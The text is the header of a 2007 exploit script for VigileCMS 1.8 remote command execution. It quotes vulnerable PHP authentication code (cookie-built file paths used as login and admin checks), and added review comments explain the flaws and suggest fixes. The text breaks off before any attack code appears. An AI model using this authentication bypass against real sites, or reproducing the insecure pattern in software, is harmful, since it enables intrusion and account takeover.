|
#!/usr/bin/python=0D
#-*- coding: iso-8859-15 -*-=0D
'''=0D
------------------------------------------------------------------------------------------------=0D
____ __________ __ ____ __ =0D
/_ | ____ |__\_____ \ _____/ |_ /_ |/ |_ =0D
| |/ \ | | _(__ <_/ ___\ __\ ______ | \ __\=0D
| | | \ | |/ \ \___| | /_____/ | || | =0D
|___|___| /\__| /______ /\___ >__| |___||__| =0D
\/\______| \/ \/ =0D
=0D
------------------------------------------------------------------------------------------------=0D
This is a Public Exploit. 22/11/2007 (dd-mm-yyyy)
------------------------------------------------------------------------------------------------
§ 0day VigileCMS <= 1.8 Stealth - Remote Command Execution §
Vendor: http://www.vigilenapoletano.it
Severity: Highest
Author: The:Paradox
Italy r0x.

Visit inj3ct-it.org

Comments: This exploit was coded to show some people what a real vulnerability is.
------------------------------------------------------------------------------------------------
Related Codes:
=0D
--- index.php; line 64:=0D
=0D
// "Remember me" auto-login from index.php: entered when both the rem_user and rem_pass
// cookies are set and the session has no user yet.
// NOTE(review): cookies are client-supplied, and no validation of either value is visible in
// this excerpt before they are used below.
if (isset($_COOKIE[rem_user]) and isset ($_COOKIE[rem_pass]) and !isset($_SESSION[user])) {=0D
// The only check shown is that a file named "<rem_user>.<rem_pass>.php" exists under USERS_TAB.
// Both name parts come straight from the cookies, so the path is not guaranteed to stay inside
// USERS_TAB, and a file-existence test is not a credential check. Hardening: restrict both
// values to a strict character allow-list and verify a stored password hash instead.
if(file_exists(USERS_TAB."/$_COOKIE[rem_user].$_COOKIE[rem_pass].php")){=0D
// The cookie values become the session identity; the is_admin() and is_superadmin() excerpts
// on this page read these same session fields.
$_SESSION[user] = $_COOKIE[rem_user];=0D
$_SESSION[pass] = $_COOKIE[rem_pass];=0D
// The cookie-derived user name is passed to logthis() as-is. logthis() is not shown here;
// presumably it writes a log entry - confirm that it encodes or filters the value.
logthis("$_SESSION[user] si =E8 collegato al Sito: riconosciuto con Cookie!");=0D
UserVisita ();// update the user's database record with the visit count=0D
}=0D
}=0D
=0D
--- func.inc.php; line 93:=0D
=0D
// Returns true when the session holds both user and pass and a file named
// "<user>.<pass>.php" exists under ADMIN_TAB; otherwise returns false.
// NOTE(review): the privilege decision rests on file_exists() over a path built from session
// values. In the index.php excerpt on this page those values are copied from cookies without
// visible validation, so they should be validated where the session is populated, and the
// admin role should be looked up from server-side data rather than inferred from a file name.
function is_admin(){ //## FUNCTION ##=0D
if( (isset($_SESSION[user]) and isset($_SESSION[pass])) && (file_exists(ADMIN_TAB."/$_SESSION[user].$_SESSION[pass].php")) ){=0D
return true;=0D
} else {=0D
return false;=0D
}=0D
}=0D
=0D
--- func.inc.php; line 109:=0D
=0D
// Returns true when the session holds both user and pass and the session user equals
// $primo_amministra; otherwise returns false.
// $primo_amministra is not assigned in this function; presumably it is defined by the included
// creazione.php - confirm.
// NOTE(review): the pass field is only tested with isset() and its value is never compared in
// this function, and the user name is compared with loose ==. A strict === comparison plus a
// real credential check would be expected for a top-privilege gate.
function is_superadmin(){ //## FUNCTION ##=0D
// The file is loaded with include on every call.
include (LOGS_TAB."/creazione.php");=0D
if (isset($_SESSION["user"]) and isset($_SESSION["pass"]) and ($_SESSION[user]==$primo_amministra)) {=0D
return true;=0D
} else {=0D
return false;=0D
}=0D
}=0D
=0D
--- vedipm.php; line 210:=0D
=0D
if ($_POST[ttl] =="") $_POST[ttl]="Nessun oggetto";=0D
=0D
=0D
=0D
$_POST[ttl] =stripslashes($_POST[ttl]);=0D
=0D
$_POST[ttl] =htmlspecialchars($_POST[ttl]); // impedisce visualizzazioni caratteri html e